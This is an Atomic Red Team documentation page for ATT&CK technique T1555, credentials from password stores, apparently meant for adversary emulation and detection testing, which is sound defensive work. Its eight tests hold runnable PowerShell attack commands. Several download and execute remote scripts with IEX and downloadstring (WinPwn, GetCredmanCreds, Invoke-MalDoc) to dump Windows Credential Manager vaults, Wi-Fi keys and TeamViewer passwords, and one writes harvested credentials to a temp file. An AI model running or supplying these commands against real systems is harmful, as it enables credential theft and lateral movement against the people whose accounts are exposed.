Try it using Invoke-Atomic

Credentials from Password Stores

Description from ATT&CK

Adversaries may search for common password storage locations to obtain user credentials. Passwords are stored in several places on a system, depending on the operating system or application holding the credentials. There are also specific applications that store passwords to make it easier for users manage and maintain. Once credentials are obtained, they can be used to perform lateral movement and access restricted information.

Atomic Tests

Atomic Test #1 - Extract Windows Credential Manager via VBA

This module will extract the credentials found within the Windows credential manager and dump them to $env:TEMP\windows-credentials.txt

Supported Platforms: windows

auto_generated_guid: 234f9b7c-b53d-4f32-897b-b880a6c9ea7b

Inputs:

None

Attack Commands: Run with powershell!

1
2
3
4

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1555\src\T1555-macrocode.txt" -officeProduct "Word" -sub "Extract"

Cleanup Commands:

1
2

Remove-Item "$env:TEMP\windows-credentials.txt" -ErrorAction Ignore

Dependencies: Run with powershell!

Description: Microsoft Word must be installed

Check Prereq Commands:

1
2
3
4
5
6
7

try {
  New-Object -COMObject "word.Application" | Out-Null
  $process = "winword"
  Stop-Process -Name $process
  exit 0
} catch { exit 1 }

Get Prereq Commands:

1
2

Write-Host "You will need to install Microsoft Word manually to meet this requirement"

Atomic Test #2 - Dump credentials from Windows Credential Manager With PowerShell [windows Credentials]

This module will extract the credentials from Windows Credential Manager

Supported Platforms: windows

auto_generated_guid: c89becbe-1758-4e7d-a0f4-97d2188a23e3

Inputs:

None

Attack Commands: Run with powershell!

1
2

IEX (IWR 'https://raw.githubusercontent.com/skar4444/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1' -UseBasicParsing); Get-PasswordVaultCredentials -Force

Atomic Test #3 - Dump credentials from Windows Credential Manager With PowerShell [web Credentials]

This module will extract the credentials from Windows Credential Manager

Supported Platforms: windows

auto_generated_guid: 8fd5a296-6772-4766-9991-ff4e92af7240

Inputs:

None

Attack Commands: Run with powershell!

1
2

IEX (IWR 'https://raw.githubusercontent.com/skar4444/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1' -UseBasicParsing); Get-CredManCreds -Force

Atomic Test #4 - Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Windows Credentials]

This module will enumerate credentials stored in Windows Credentials vault of Windows Credential Manager using builtin utility vaultcmd.exe

Supported Platforms: windows

auto_generated_guid: 36753ded-e5c4-4eb5-bc3c-e8fba236878d

Inputs:

None

Attack Commands: Run with powershell!

1
2

vaultcmd /listcreds:"Windows Credentials" /all

Atomic Test #5 - Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Web Credentials]

This module will enumerate credentials stored in Web Credentials vault of Windows Credential Manager using builtin utility vaultcmd.exe

Supported Platforms: windows

auto_generated_guid: bc071188-459f-44d5-901a-f8f2625b2d2e

Inputs:

None

Attack Commands: Run with powershell!

1
2

vaultcmd /listcreds:"Web Credentials" /all

Atomic Test #6 - WinPwn - Loot local Credentials - lazagne

The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext, APIs, custom algorithms, databases, etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software

Supported Platforms: windows

auto_generated_guid: 079ee2e9-6f16-47ca-a635-14efcd994118

Inputs:

None

Attack Commands: Run with powershell!

1
2
3

$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
lazagnemodule -consoleoutput -noninteractive

Atomic Test #7 - WinPwn - Loot local Credentials - Wifi Credentials

Loot local Credentials - Wifi Credentials technique via function of WinPwn

Supported Platforms: windows

auto_generated_guid: afe369c2-b42e-447f-98a3-fb1f4e2b8552

Inputs:

None

Attack Commands: Run with powershell!

1
2
3

$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
wificreds -consoleoutput -noninteractive

Atomic Test #8 - WinPwn - Loot local Credentials - Decrypt Teamviewer Passwords

Loot local Credentials - Decrypt Teamviewer Passwords technique via function of WinPwn

Supported Platforms: windows

auto_generated_guid: db965264-3117-4bad-b7b7-2523b7856b92

Inputs:

None

Attack Commands: Run with powershell!

1
2
3

$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
decryptteamviewer -consoleoutput -noninteractive

source